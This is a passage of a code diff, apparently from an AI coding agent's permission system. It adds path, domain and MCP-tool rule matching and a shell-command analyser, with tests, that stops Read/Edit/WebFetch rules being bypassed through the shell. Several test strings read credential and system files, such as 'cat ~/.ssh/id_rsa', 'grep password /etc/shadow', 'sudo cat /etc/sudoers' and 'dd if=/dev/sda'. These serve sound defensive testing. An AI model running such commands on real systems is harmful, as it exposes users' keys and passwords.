+ *
+ * | Prefix    | Meaning                           | Example                      |
+ * |-----------|-----------------------------------|------------------------------|
+ * | `//path`  | Absolute from filesystem root     | `//Users/alice/secrets/**`   |
+ * | `~/path`  | Relative to home directory        | `~/Documents/*.pdf`          |
+ * | `/path`   | Relative to project root          | `/src/**\/*.ts`              |
+ * | `./path`  | Relative to current working dir   | `./secrets/**`               |
+ * | `path`    | Relative to current working dir   | `*.env`                      |
+ *
+ * WARNING: `/Users/alice/file` is NOT an absolute path — it's relative to
+ * the project root. Use `//Users/alice/file` for absolute paths.
+ *
+ * @param specifier - The raw path specifier from the rule.
+ * @param projectRoot - Base directory for `/path` specifiers.
+ * @param cwd - Base directory for `./path` and un-prefixed specifiers.
+ * @returns The resolved glob pattern, using forward slashes.
+ */
+export function resolvePathPattern(
+  specifier: string,
+  projectRoot: string,
+  cwd: string,
+): string {
+  // Join under a base directory and normalize separators to forward slashes
+  // for cross-platform picomatch compatibility.
+  const under = (base: string, rest: string): string =>
+    toPosixPath(path.join(base, rest));
+
+  // `//path` → `/path`: absolute from the filesystem root. Must be tested
+  // before the single-slash (project-root) case below.
+  if (specifier.startsWith('//')) {
+    return specifier.substring(1);
+  }
+  // `~/path`: relative to the home directory.
+  if (specifier.startsWith('~/')) {
+    return under(os.homedir(), specifier.substring(2));
+  }
+  // `/path`: relative to the project root (NOT absolute!).
+  if (specifier.startsWith('/')) {
+    return under(projectRoot, specifier.substring(1));
+  }
+  // `./path` and bare `path`: relative to the current working directory.
+  const relative = specifier.startsWith('./')
+    ? specifier.substring(2)
+    : specifier;
+  return under(cwd, relative);
+}
+
+/**
+ * Match a file path against a gitignore-style path pattern.
+ *
+ * Uses picomatch for the actual glob matching, following gitignore semantics:
+ *   - `*` matches files in a single directory (does not cross `/`)
+ *   - `**` matches recursively across directories
+ *
+ * @param specifier - The raw specifier from the rule (e.g. "./secrets/**")
+ * @param filePath - The absolute path of the file being accessed
+ * @param projectRoot - The project root directory (absolute)
+ * @param cwd - The current working directory (absolute)
+ * @returns True if the file path matches the pattern
+ */
+export function matchesPathPattern(
+  specifier: string,
+  filePath: string,
+  projectRoot: string,
+  cwd: string,
+): boolean {
+  const matcher = picomatch(resolvePathPattern(specifier, projectRoot, cwd), {
+    dot: true, // Match dotfiles (e.g. .env)
+    nocase: false, // Case-sensitive (filesystem convention)
+    // Note: do NOT set bash: true — it makes `*` match across directories.
+    // Default picomatch behavior is gitignore-style: `*` = single dir, `**` = recursive.
+  });
+
+  // Incoming paths may use backslashes on Windows; picomatch expects
+  // forward slashes.
+  return matcher(toPosixPath(filePath));
+}
+
+// ─────────────────────────────────────────────────────────────────────────────
+// Domain matching (for WebFetch)
+// ─────────────────────────────────────────────────────────────────────────────
+
+/**
+ * Match a domain against a WebFetch domain specifier.
+ *
+ * Specifier format: `domain:example.com` (the `domain:` prefix is optional).
+ * Matches the exact domain or any subdomain, case-insensitively.
+ *
+ * Examples:
+ *   matchesDomainPattern("domain:example.com", "example.com")      → true
+ *   matchesDomainPattern("domain:example.com", "sub.example.com")  → true
+ *   matchesDomainPattern("domain:example.com", "notexample.com")   → false
+ *
+ * @returns False when either the pattern or the domain is empty.
+ */
+export function matchesDomainPattern(
+  specifier: string,
+  domain: string,
+): boolean {
+  // Strip the "domain:" prefix if present
+  const withoutPrefix = specifier.startsWith('domain:')
+    ? specifier.substring(7)
+    : specifier;
+  const pattern = withoutPrefix.trim();
+
+  if (!pattern || !domain) {
+    return false;
+  }
+
+  const host = domain.toLowerCase();
+  const wanted = pattern.toLowerCase();
+
+  // Exact match, or a subdomain: "sub.example.com" matches "example.com".
+  return host === wanted || host.endsWith('.' + wanted);
+}
+
+// ─────────────────────────────────────────────────────────────────────────────
+// MCP tool wildcard matching
+// ─────────────────────────────────────────────────────────────────────────────
+
+/**
+ * Match an MCP tool name against a pattern that may contain wildcards.
+ *
+ * Per Claude Code docs:
+ *   "mcp__puppeteer" matches any tool provided by the puppeteer server
+ *   "mcp__puppeteer__*" wildcard syntax, also matches all tools from the server
+ *   "mcp__puppeteer__puppeteer_navigate" matches only that exact tool
+ *
+ * @param pattern - The rule's tool name, possibly ending in `*`.
+ * @param toolName - The tool name being checked.
+ * @returns True when the tool is covered by the pattern.
+ */
+function matchesMcpPattern(pattern: string, toolName: string): boolean {
+  if (pattern === toolName) {
+    return true;
+  }
+
+  // Trailing-wildcard patterns match by prefix, e.g. "mcp__server__*" covers
+  // every tool of that server and "mcp__chrome__use_*" every "use_*" tool.
+  if (pattern.endsWith('*')) {
+    return toolName.startsWith(pattern.slice(0, -1));
+  }
+
+  // Server-level match: "mcp__puppeteer" covers "mcp__puppeteer__anything".
+  // Applies only when the pattern is exactly "<prefix>__<server>" and the
+  // tool name has at least three "__"-separated parts.
+  const [patternPrefix, patternServer, ...patternRest] = pattern.split('__');
+  const toolParts = toolName.split('__');
+  return (
+    patternServer !== undefined &&
+    patternRest.length === 0 &&
+    toolParts.length >= 3 &&
+    patternPrefix === toolParts[0] &&
+    patternServer === toolParts[1]
+  );
+}
+
+// ─────────────────────────────────────────────────────────────────────────────
+// Unified rule matching
+// ─────────────────────────────────────────────────────────────────────────────
+
+/**
+ * Options for path-based matching, providing the directory context needed
+ * to resolve relative path patterns.
+ */
+export interface PathMatchContext {
+  /** The project root directory (absolute path). */
+  projectRoot: string;
+  /** The current working directory (absolute path). */
+  cwd: string;
+}
+
+/**
+ * Check whether a parsed PermissionRule matches a given context.
+ *
+ * Matching logic depends on the tool and specifier type:
+ *
+ * 1. **Tool name matching**:
+ *    - "Read" rules also match grep_search, glob, list_directory (meta-category).
+ *    - "Edit" rules also match write_file (meta-category).
+ *    - MCP tools support wildcard patterns (e.g.
"mcp__server__*").
+ *
+ * 2. **No specifier**: matches any invocation of the tool.
+ *
+ * 3. **With specifier** (depends on specifierKind):
+ *    - `command`: Shell glob matching with word boundary & operator awareness
+ *    - `path`: Gitignore-style file path matching (*, **)
+ *    - `domain`: Domain matching for WebFetch
+ *    - `literal`: Exact string match (for Agent subagent names, etc.)
+ *
+ * @param rule - The parsed permission rule
+ * @param toolName - The tool name being checked (aliases are resolved here)
+ * @param command - Shell command (for Bash rules)
+ * @param filePath - Absolute file path (for Read/Edit rules)
+ * @param domain - Domain (for WebFetch rules)
+ * @param pathContext - Project root and cwd for resolving relative path
+ *   patterns; falls back to `process.cwd()` for both when omitted
+ * @param specifier - Literal value compared against the rule's specifier for
+ *   `literal` rules when `command` is undefined
+ * @returns True when the rule applies to the described invocation
+ */
+export function matchesRule(
+  rule: PermissionRule,
+  toolName: string,
+  command?: string,
+  filePath?: string,
+  domain?: string,
+  pathContext?: PathMatchContext,
+  specifier?: string,
+): boolean {
+  const canonicalCtxToolName = resolveToolName(toolName);
+
+  // MCP tools: when either side is an MCP name, the name comparison decides
+  // the outcome on its own (specifiers are not consulted).
+  const involvesMcp =
+    rule.toolName.startsWith('mcp__') ||
+    canonicalCtxToolName.startsWith('mcp__');
+  if (involvesMcp) {
+    return matchesMcpPattern(rule.toolName, canonicalCtxToolName);
+  }
+
+  // Standard tool name matching (with meta-category support).
+  if (!toolMatchesRuleToolName(rule.toolName, canonicalCtxToolName)) {
+    return false;
+  }
+
+  // No specifier → match any invocation of the tool.
+  if (!rule.specifier) {
+    return true;
+  }
+
+  // Specifier matching (kind-dependent). A missing context value for the
+  // rule's kind means the rule cannot apply.
+  const kind = rule.specifierKind ?? getSpecifierKind(rule.toolName);
+
+  if (kind === 'command') {
+    return (
+      command !== undefined && matchesCommandPattern(rule.specifier, command)
+    );
+  }
+
+  if (kind === 'path') {
+    if (filePath === undefined) {
+      return false;
+    }
+    const fallbackDir = process.cwd();
+    const dirs = pathContext ?? { projectRoot: fallbackDir, cwd: fallbackDir };
+    return matchesPathPattern(
+      rule.specifier,
+      filePath,
+      dirs.projectRoot,
+      dirs.cwd,
+    );
+  }
+
+  if (kind === 'domain') {
+    return domain !== undefined && matchesDomainPattern(rule.specifier, domain);
+  }
+
+  // Literal/exact matching (for Skill names, Agent subagent types, etc.);
+  // `command` takes precedence over `specifier` when both are given.
+  const literalValue = command ?? specifier;
+  return literalValue !== undefined && literalValue === rule.specifier;
+}
diff --git a/packages/core/src/permissions/shell-semantics.test.ts b/packages/core/src/permissions/shell-semantics.test.ts
new file mode 100644
index 000000000..a58be8c14
--- /dev/null
+++ b/packages/core/src/permissions/shell-semantics.test.ts
@@ -0,0 +1,414 @@
+/**
+ * @license
+ * Copyright 2025 Qwen team
+ * SPDX-License-Identifier: Apache-2.0
+ */
+
+import { describe, it, expect } from 'vitest';
+import { extractShellOperations } from './shell-semantics.js';
+import type { ShellOperation } from './shell-semantics.js';
+
+const CWD = '/home/user/project';
+
+// Helper: sort ops for stable comparison
+function sorted(ops: ShellOperation[]) {
+  return [...ops].sort((a, b) =>
+    `${a.virtualTool}:${a.filePath ?? ''}:${a.domain ?? ''}`.localeCompare(
+      `${b.virtualTool}:${b.filePath ?? ''}:${b.domain ??
''}`, + ), + ); +} + +describe('extractShellOperations', () => { + // ── Empty / no-op ────────────────────────────────────────────────────────── + + it('returns [] for empty string', () => { + expect(extractShellOperations('', CWD)).toEqual([]); + }); + + it('returns [] for whitespace', () => { + expect(extractShellOperations(' ', CWD)).toEqual([]); + }); + + it('returns [] for unknown commands', () => { + expect(extractShellOperations('frobnicate /etc/passwd', CWD)).toEqual([]); + }); + + it('returns [] for env-var assignments', () => { + expect(extractShellOperations('FOO=bar', CWD)).toEqual([]); + }); + + // ── cat ──────────────────────────────────────────────────────────────────── + + it('cat: absolute path', () => { + const ops = extractShellOperations('cat /etc/passwd', CWD); + expect(ops).toEqual([ + { virtualTool: 'read_file', filePath: '/etc/passwd' }, + ]); + }); + + it('cat: relative path resolved against cwd', () => { + const ops = extractShellOperations('cat secrets.txt', CWD); + expect(ops).toEqual([ + { virtualTool: 'read_file', filePath: `${CWD}/secrets.txt` }, + ]); + }); + + it('cat: ~ expansion', () => { + const ops = extractShellOperations('cat ~/.ssh/id_rsa', CWD); + expect(ops[0]?.filePath).toMatch(/\/\.ssh\/id_rsa$/); + }); + + it('cat: multiple files', () => { + const ops = extractShellOperations('cat /a/b /c/d', CWD); + expect(sorted(ops)).toEqual([ + { virtualTool: 'read_file', filePath: '/a/b' }, + { virtualTool: 'read_file', filePath: '/c/d' }, + ]); + }); + + it('cat: flags are ignored', () => { + const ops = extractShellOperations('cat -n /etc/hosts', CWD); + expect(ops).toEqual([{ virtualTool: 'read_file', filePath: '/etc/hosts' }]); + }); + + it('cat: quoted path', () => { + const ops = extractShellOperations("cat '/etc/my file.conf'", CWD); + expect(ops).toEqual([ + { virtualTool: 'read_file', filePath: '/etc/my file.conf' }, + ]); + }); + + // ── head / tail ──────────────────────────────────────────────────────────── + + 
it('head: -n value not treated as path', () => { + const ops = extractShellOperations('head -n 10 /var/log/syslog', CWD); + expect(ops).toEqual([ + { virtualTool: 'read_file', filePath: '/var/log/syslog' }, + ]); + }); + + it('tail: multiple files with flag', () => { + const ops = extractShellOperations('tail -c 100 /a /b', CWD); + expect(sorted(ops)).toEqual([ + { virtualTool: 'read_file', filePath: '/a' }, + { virtualTool: 'read_file', filePath: '/b' }, + ]); + }); + + // ── diff ─────────────────────────────────────────────────────────────────── + + it('diff: two files', () => { + const ops = extractShellOperations('diff /old /new', CWD); + expect(sorted(ops)).toEqual([ + { virtualTool: 'read_file', filePath: '/new' }, + { virtualTool: 'read_file', filePath: '/old' }, + ]); + }); + + // ── grep ─────────────────────────────────────────────────────────────────── + + it('grep: first positional is pattern, rest are files', () => { + const ops = extractShellOperations('grep password /etc/shadow', CWD); + expect(ops).toEqual([ + { virtualTool: 'read_file', filePath: '/etc/shadow' }, + ]); + }); + + it('grep: -r becomes list_directory', () => { + const ops = extractShellOperations('grep -r secret /etc', CWD); + expect(ops).toEqual([{ virtualTool: 'list_directory', filePath: '/etc' }]); + }); + + it('grep: -e flag shifts all positionals to paths', () => { + const ops = extractShellOperations( + 'grep -e password /etc/passwd /etc/shadow', + CWD, + ); + expect(sorted(ops)).toEqual([ + { virtualTool: 'read_file', filePath: '/etc/passwd' }, + { virtualTool: 'read_file', filePath: '/etc/shadow' }, + ]); + }); + + it('grep: -f patternfile — positionals are file paths', () => { + const ops = extractShellOperations('grep -f patterns.txt /etc/hosts', CWD); + // -f consumes patterns.txt; /etc/hosts is the only positional → first positional skipped? No. 
+ // With -f, hasPatternFlag=true, so all positionals are file paths (no slice(1)) + expect(ops).toEqual([{ virtualTool: 'read_file', filePath: '/etc/hosts' }]); + }); + + it('grep: -A value not treated as path', () => { + const ops = extractShellOperations('grep -A 3 error /var/log/app.log', CWD); + expect(ops).toEqual([ + { virtualTool: 'read_file', filePath: '/var/log/app.log' }, + ]); + }); + + // ── ls / find ────────────────────────────────────────────────────────────── + + it('ls: no args defaults to cwd', () => { + const ops = extractShellOperations('ls', CWD); + expect(ops).toEqual([{ virtualTool: 'list_directory', filePath: CWD }]); + }); + + it('ls: explicit dir', () => { + const ops = extractShellOperations('ls /var/log', CWD); + expect(ops).toEqual([ + { virtualTool: 'list_directory', filePath: '/var/log' }, + ]); + }); + + it('find: first positional is starting dir', () => { + const ops = extractShellOperations('find /etc -name "*.conf"', CWD); + expect(ops).toEqual([{ virtualTool: 'list_directory', filePath: '/etc' }]); + }); + + it('find: no starting dir defaults to cwd', () => { + const ops = extractShellOperations('find -name "*.txt"', CWD); + expect(ops).toEqual([{ virtualTool: 'list_directory', filePath: CWD }]); + }); + + // ── touch / mkdir ────────────────────────────────────────────────────────── + + it('touch: creates a file (write_file)', () => { + const ops = extractShellOperations('touch /tmp/new.txt', CWD); + expect(ops).toEqual([ + { virtualTool: 'write_file', filePath: '/tmp/new.txt' }, + ]); + }); + + it('mkdir: creates a directory (write_file)', () => { + const ops = extractShellOperations('mkdir -p /tmp/a/b', CWD); + expect(ops).toEqual([{ virtualTool: 'write_file', filePath: '/tmp/a/b' }]); + }); + + // ── cp / mv ──────────────────────────────────────────────────────────────── + + it('cp: src=read, dst=write', () => { + const ops = extractShellOperations('cp /etc/passwd /tmp/backup', CWD); + expect(sorted(ops)).toEqual([ + { 
virtualTool: 'read_file', filePath: '/etc/passwd' }, + { virtualTool: 'write_file', filePath: '/tmp/backup' }, + ]); + }); + + it('mv: src=edit, dst=write', () => { + const ops = extractShellOperations('mv /tmp/a /tmp/b', CWD); + expect(sorted(ops)).toEqual([ + { virtualTool: 'edit', filePath: '/tmp/a' }, + { virtualTool: 'write_file', filePath: '/tmp/b' }, + ]); + }); + + // ── rm ───────────────────────────────────────────────────────────────────── + + it('rm: single file is edit', () => { + const ops = extractShellOperations('rm /tmp/secret.txt', CWD); + expect(ops).toEqual([{ virtualTool: 'edit', filePath: '/tmp/secret.txt' }]); + }); + + it('rm -rf: directory is edit', () => { + const ops = extractShellOperations('rm -rf /tmp/dir', CWD); + expect(ops).toEqual([{ virtualTool: 'edit', filePath: '/tmp/dir' }]); + }); + + // ── chmod / chown ────────────────────────────────────────────────────────── + + it('chmod: mode arg is skipped, file is edit', () => { + const ops = extractShellOperations('chmod 755 /usr/local/bin/script', CWD); + expect(ops).toEqual([ + { virtualTool: 'edit', filePath: '/usr/local/bin/script' }, + ]); + }); + + it('chown: owner arg is skipped, file is edit', () => { + const ops = extractShellOperations('chown root:root /etc/config', CWD); + expect(ops).toEqual([{ virtualTool: 'edit', filePath: '/etc/config' }]); + }); + + // ── sed ──────────────────────────────────────────────────────────────────── + + it('sed without -i: read_file', () => { + const ops = extractShellOperations("sed 's/foo/bar/' /etc/hosts", CWD); + expect(ops).toEqual([{ virtualTool: 'read_file', filePath: '/etc/hosts' }]); + }); + + it('sed -i: edit', () => { + const ops = extractShellOperations("sed -i 's/foo/bar/' /etc/hosts", CWD); + expect(ops).toEqual([{ virtualTool: 'edit', filePath: '/etc/hosts' }]); + }); + + it('sed -e: all positionals are files', () => { + const ops = extractShellOperations("sed -e 's/foo/bar/' /a /b", CWD); + expect(sorted(ops)).toEqual([ + { 
virtualTool: 'read_file', filePath: '/a' }, + { virtualTool: 'read_file', filePath: '/b' }, + ]); + }); + + // ── awk ──────────────────────────────────────────────────────────────────── + + it('awk: program expression filtered, file identified', () => { + const ops = extractShellOperations("awk '{print $1}' /etc/passwd", CWD); + expect(ops).toEqual([ + { virtualTool: 'read_file', filePath: '/etc/passwd' }, + ]); + }); + + it('awk -F: separator consumed, file identified', () => { + const ops = extractShellOperations("awk -F: '{print $2}' /etc/shadow", CWD); + expect(ops).toEqual([ + { virtualTool: 'read_file', filePath: '/etc/shadow' }, + ]); + }); + + // ── dd ───────────────────────────────────────────────────────────────────── + + it('dd if= and of=', () => { + const ops = extractShellOperations('dd if=/dev/sda of=/tmp/disk.img', CWD); + expect(sorted(ops)).toEqual([ + { virtualTool: 'read_file', filePath: '/dev/sda' }, + { virtualTool: 'write_file', filePath: '/tmp/disk.img' }, + ]); + }); + + // ── Redirections ─────────────────────────────────────────────────────────── + + it('redirect >: write_file', () => { + const ops = extractShellOperations('echo hello > /tmp/out.txt', CWD); + expect(ops).toEqual([ + { virtualTool: 'write_file', filePath: '/tmp/out.txt' }, + ]); + }); + + it('redirect >>: write_file', () => { + const ops = extractShellOperations('date >> /var/log/app.log', CWD); + expect(ops).toEqual([ + { virtualTool: 'write_file', filePath: '/var/log/app.log' }, + ]); + }); + + it('redirect <: read_file', () => { + const ops = extractShellOperations('sort < /tmp/data.txt', CWD); + expect(ops).toContainEqual({ + virtualTool: 'read_file', + filePath: '/tmp/data.txt', + }); + }); + + it('combined redirect >file without space', () => { + const ops = extractShellOperations('echo hi >/tmp/foo', CWD); + expect(ops).toContainEqual({ + virtualTool: 'write_file', + filePath: '/tmp/foo', + }); + }); + + it('redirect 2>/dev/null: ignored (no op)', () => { + const 
ops = extractShellOperations('cat /etc/passwd 2>/dev/null', CWD); + expect(ops).not.toContainEqual( + expect.objectContaining({ filePath: '/dev/null' }), + ); + expect(ops).toContainEqual({ + virtualTool: 'read_file', + filePath: '/etc/passwd', + }); + }); + + // ── curl / wget ──────────────────────────────────────────────────────────── + + it('curl: extracts domain', () => { + const ops = extractShellOperations( + 'curl https://api.example.com/data', + CWD, + ); + expect(ops).toEqual([ + { virtualTool: 'web_fetch', domain: 'api.example.com' }, + ]); + }); + + it('curl: -o flag value not treated as URL', () => { + const ops = extractShellOperations( + 'curl -o /tmp/out.json https://api.example.com', + CWD, + ); + expect(ops).toEqual([ + { virtualTool: 'web_fetch', domain: 'api.example.com' }, + ]); + }); + + it('wget: extracts domain', () => { + const ops = extractShellOperations( + 'wget https://example.com/file.tar.gz', + CWD, + ); + expect(ops).toEqual([{ virtualTool: 'web_fetch', domain: 'example.com' }]); + }); + + it('wget: -O flag value not treated as URL', () => { + const ops = extractShellOperations( + 'wget -O /tmp/file.gz https://example.com/f.gz', + CWD, + ); + expect(ops).toEqual([{ virtualTool: 'web_fetch', domain: 'example.com' }]); + }); + + // ── sudo / prefix commands ───────────────────────────────────────────────── + + it('sudo cat: transparent wrapper', () => { + const ops = extractShellOperations('sudo cat /etc/sudoers', CWD); + expect(ops).toEqual([ + { virtualTool: 'read_file', filePath: '/etc/sudoers' }, + ]); + }); + + it('sudo -u user cat: strips flags before inner cmd', () => { + const ops = extractShellOperations('sudo -u root cat /etc/shadow', CWD); + expect(ops).toEqual([ + { virtualTool: 'read_file', filePath: '/etc/shadow' }, + ]); + }); + + it('env cmd: transparent wrapper', () => { + const ops = extractShellOperations('env cat /etc/hosts', CWD); + expect(ops).toEqual([{ virtualTool: 'read_file', filePath: '/etc/hosts' }]); + }); 
+ + it('timeout cmd: transparent wrapper', () => { + const ops = extractShellOperations( + 'timeout 30 wget https://example.com', + CWD, + ); + expect(ops).toEqual([{ virtualTool: 'web_fetch', domain: 'example.com' }]); + }); + + // ── Combination: command + redirect ─────────────────────────────────────── + + it('cat src > dst: both read and write', () => { + const ops = extractShellOperations('cat /etc/passwd > /tmp/copy', CWD); + expect(sorted(ops)).toEqual([ + { virtualTool: 'read_file', filePath: '/etc/passwd' }, + { virtualTool: 'write_file', filePath: '/tmp/copy' }, + ]); + }); + + it('grep pattern file > out: read + write', () => { + const ops = extractShellOperations( + 'grep secret /etc/config > /tmp/out', + CWD, + ); + expect(sorted(ops)).toEqual([ + { virtualTool: 'read_file', filePath: '/etc/config' }, + { virtualTool: 'write_file', filePath: '/tmp/out' }, + ]); + }); + + // ── Variables / unresolvable patterns ───────────────────────────────────── + + it('$VAR paths are not included', () => { + const ops = extractShellOperations('cat $SECRET_FILE', CWD); + // $SECRET_FILE starts with $, filtered by looksLikePath + expect(ops).toEqual([]); + }); +}); diff --git a/packages/core/src/permissions/shell-semantics.ts b/packages/core/src/permissions/shell-semantics.ts new file mode 100644 index 000000000..414d51103 --- /dev/null +++ b/packages/core/src/permissions/shell-semantics.ts @@ -0,0 +1,1685 @@ +/** + * @license + * Copyright 2025 Qwen team + * SPDX-License-Identifier: Apache-2.0 + */ + +/** + * Shell command semantic analysis for permission matching. + * + * Analyzes simple shell commands to extract "virtual tool operations" so that + * Read / Edit / Write / WebFetch / ListFiles permission rules can match their + * shell equivalents and prevent bypass via the shell tool. 
/**
 * @example
 * extractShellOperations('cat /etc/passwd', '/home/user')
 * // → [{ virtualTool: 'read_file', filePath: '/etc/passwd' }]
 *
 * @example
 * extractShellOperations('curl https://example.com/api', '/home/user')
 * // → [{ virtualTool: 'web_fetch', domain: 'example.com' }]
 *
 * @example
 * extractShellOperations('echo hi > /etc/motd', '/home/user')
 * // → [{ virtualTool: 'write_file', filePath: '/etc/motd' }]
 *
 * Known limitations (cannot be statically analysed):
 * - Shell variable expansion: `cat $FILE`
 * - Command substitution: `cat $(find .)`
 * - Interpreter scripts: `python script.py`, `node x.js`
 * - Pipe targets: `find . | xargs cat`
 * - Complex dynamic expressions: `eval "cat $f"`
 */

import nodePath from 'node:path';
import os from 'node:os';

// ─────────────────────────────────────────────────────────────────────────────
// Types
// ─────────────────────────────────────────────────────────────────────────────

/**
 * A virtual file or network operation extracted from a shell command.
 * Used to match Read / Edit / Write / WebFetch / ListFiles permission rules
 * against shell commands that perform equivalent operations.
 *
 * File and directory operations carry `filePath`; `web_fetch` operations
 * carry `domain` instead.
 */
export interface ShellOperation {
  /**
   * The virtual tool this operation maps to.
   * Matches the canonical tool names used in the permission system.
   *
   * Examples from the handlers in this module: `cat` → `read_file`,
   * `ls` / `find` → `list_directory`, `rm` / `chmod` → `edit`,
   * `touch` / `cp` destination → `write_file`, `curl` / `wget` → `web_fetch`.
   *
   * NOTE(review): none of the handlers visible next to this type emit
   * `grep_search` — confirm where that value is produced.
   */
  virtualTool:
    | 'read_file'
    | 'list_directory'
    | 'edit'
    | 'write_file'
    | 'web_fetch'
    | 'grep_search';
  /** Absolute file or directory path (for file operations). */
  filePath?: string;
  /** Domain name without port (for web_fetch operations). */
  domain?: string;
}

// ─────────────────────────────────────────────────────────────────────────────
// Tokenizer
// ─────────────────────────────────────────────────────────────────────────────

/**
 * Tokenize a shell command string, respecting single/double quotes and
 * backslash escapes, splitting on unquoted whitespace.
 */
/**
 * Split one simple command into argument tokens using POSIX-style quoting.
 *
 * The input should be a single simple command (already split from compound
 * commands via `splitCompoundCommand`).
 *
 * Quoting rules:
 * - Single quotes preserve every character literally.
 * - Inside double quotes a backslash only escapes `$`, a backtick, `"`, `\`
 *   and newline; before any other character the backslash itself is kept
 *   (so `"C:\dir"` keeps its separators).
 * - Outside quotes a backslash escapes the next character.
 * - An explicitly quoted empty string (`''` or `""`) yields an empty token,
 *   so the arguments after it keep their positions.
 *
 * @param command - Raw text of one simple command.
 * @returns The tokens with quotes and escape characters removed.
 */
function tokenize(command: string): string[] {
  // Characters a backslash may escape inside double quotes (POSIX sh).
  const escapableInDouble = '$`"\\\n';
  const tokens: string[] = [];
  let current = '';
  // Set as soon as a token begins, even while it is still empty (`''`).
  let started = false;
  let inSingle = false;
  let inDouble = false;

  for (let i = 0; i < command.length; i++) {
    const ch = command[i]!;

    if (inSingle) {
      if (ch === "'") {
        inSingle = false;
      } else {
        current += ch;
      }
      continue;
    }

    if (ch === '\\') {
      const next = command[i + 1];
      if (next === undefined) {
        // A trailing backslash has nothing to escape; drop it.
        continue;
      }
      started = true;
      if (inDouble && !escapableInDouble.includes(next)) {
        // Not an escape sequence inside double quotes: keep the backslash and
        // let the next iteration append `next` as an ordinary character.
        current += ch;
        continue;
      }
      current += next;
      i++;
      continue;
    }

    if (inDouble) {
      if (ch === '"') {
        inDouble = false;
      } else {
        current += ch;
      }
      continue;
    }

    if (ch === "'") {
      inSingle = true;
      started = true;
      continue;
    }
    if (ch === '"') {
      inDouble = true;
      started = true;
      continue;
    }
    if (ch === ' ' || ch === '\t') {
      if (started) {
        tokens.push(current);
        current = '';
        started = false;
      }
      continue;
    }
    current += ch;
    started = true;
  }

  if (started) tokens.push(current);
  return tokens;
}

// ─────────────────────────────────────────────────────────────────────────────
// Path helpers
// ─────────────────────────────────────────────────────────────────────────────

/**
 * Resolve a path argument to an absolute, normalized POSIX-style path.
 * Handles `~` home-directory expansion and relative paths.
 *
 * Always returns paths with forward-slash separators so that the resolved
 * paths are consistent across platforms and compatible with picomatch / the
 * permission rule matching system.
 *
 * `.` / `..` segments and repeated slashes are collapsed for absolute inputs
 * as well as relative ones, so `/allowed/../etc/passwd` is reported as
 * `/etc/passwd` and cannot slip past a path rule by spelling.
 *
 * @param p - Path argument as written on the command line.
 * @param cwd - Working directory used for relative paths.
 * @returns The absolute path using `/` separators.
 */
function resolvePath(p: string, cwd: string): string {
  const toPosix = (s: string): string => s.replace(/\\/g, '/');
  const target = toPosix(p);

  if (target === '~' || target.startsWith('~/')) {
    const home = toPosix(os.homedir());
    // `target.slice(1)` is '/some/path'; posix.join also normalizes it:
    //   join('C:/Users/foo', '/.ssh/id_rsa') → 'C:/Users/foo/.ssh/id_rsa'
    return target === '~' ? home : nodePath.posix.join(home, target.slice(1));
  }

  // Covers POSIX (/foo) and, on Windows hosts, drive-letter (C:/foo) paths.
  if (nodePath.isAbsolute(target) || target.startsWith('/')) {
    const normalized = nodePath.posix.normalize(target);
    // On Windows hosts `//server/share` is a UNC path; keep its double slash,
    // which posix.normalize would otherwise collapse.
    const isUnc = nodePath.sep === '\\' && /^\/\/[^/]/.test(target);
    return isUnc ? `/${normalized}` : normalized;
  }

  return nodePath.posix.join(toPosix(cwd), target);
}

/**
 * Return true if a token looks like a file/directory path argument, as
 * opposed to a flag, shell variable, number, or script expression.
 *
 * @param s - A single command-line token.
 */
function looksLikePath(s: string): boolean {
  if (!s) return false;
  const isShellVariable = s.startsWith('$');
  const isFlag = s.startsWith('-');
  // Pure integers are most likely a count/size/mode (e.g. -n 10, chmod 755).
  const isInteger = /^\d+$/.test(s);
  // awk/sed programs and brace expansions.
  const isScriptLike = s.includes('{') || s.includes('}');
  // URLs are handled separately by the web-fetch handlers.
  const isUrl = s.includes('://');
  return !(isShellVariable || isFlag || isInteger || isScriptLike || isUrl);
}

// ─────────────────────────────────────────────────────────────────────────────
// Redirect extraction
// ─────────────────────────────────────────────────────────────────────────────

/** Absolute paths touched by the I/O redirections of one command. */
interface RedirectResult {
  /** Targets of input redirections (`< file`). */
  readFiles: string[];
  /** Targets of output redirections (`> file`, `>> file`, `2> file`, …). */
  writeFiles: string[];
}

/**
 * Extract I/O redirections from a token array.
 *
 * Modifies `tokens` in-place to remove redirect operators and their targets.
 * Returns the absolute paths of redirect targets as read / write operations.
 */
/**
 * Strip I/O redirections out of `tokens` and report the files they touch.
 *
 * Handles:
 *   `> file`   `>> file`   `< file`   (with or without space)
 *   `1> file`  `2> file`   `2>> file`   `&> file`   `&>> file`
 *   Combined forms: `>file`, `>>file`, `1>file`, `2>/dev/null`, `>&file`
 *
 * Removed from `tokens` but NOT reported as file operations:
 *   - `/dev/null` targets, in every form
 *   - descriptor duplication / closing: `2>&1`, `>&2`, `<&-`
 *   - here-documents and here-strings: `<<EOF`, `<<-EOF`, `<<< word`
 *   - targets that do not look like a path (e.g. `> $OUT`)
 *
 * An operator is always removed together with its target, so a redirect that
 * cannot be resolved never leaks into the command's positional arguments.
 *
 * @param tokens - Command tokens; rewritten in place without the redirects.
 * @param cwd - Directory used to resolve relative targets.
 * @returns Absolute paths read from (`<`) and written to (all other forms).
 */
function extractRedirects(tokens: string[], cwd: string): RedirectResult {
  // Optional fd 1/2 prefix, the operator, then an optional glued-on target.
  const redirectRe = /^([12]?>>|[12]?>|&>>|&>|<)(.*)$/;
  // `<<`, `<<-` and `<<<` introduce inline input, never a file name.
  const hereRe = /^<<[<-]?(.*)$/;
  // `&1`, `&2`, `&-` … duplicate or close a descriptor instead of naming a file.
  const fdDupRe = /^&(\d+|-)$/;

  const readFiles: string[] = [];
  const writeFiles: string[] = [];
  const kept: string[] = [];

  for (let i = 0; i < tokens.length; i++) {
    const tok = tokens[i]!;

    // Must be checked first: `<<EOF` would otherwise parse as `<` + `<EOF`.
    const here = hereRe.exec(tok);
    if (here) {
      // Delimiter / word supplied as the next token: drop it as well.
      if (here[1] === '' && i + 1 < tokens.length) i++;
      continue;
    }

    const match = redirectRe.exec(tok);
    if (!match) {
      kept.push(tok);
      continue;
    }

    const op = match[1]!;
    let target = match[2]!;
    if (target === '') {
      // Operator and target are separate tokens (`> file`).
      const next = tokens[i + 1];
      if (next === undefined) continue; // dangling operator, nothing to record
      target = next;
      i++;
    }

    if (fdDupRe.test(target)) continue;
    // `>&word` with a non-numeric word redirects to the file `word`.
    if (target.startsWith('&')) target = target.slice(1);
    if (target === '/dev/null' || !looksLikePath(target)) continue;

    const bucket = op === '<' ? readFiles : writeFiles;
    bucket.push(resolvePath(target, cwd));
  }

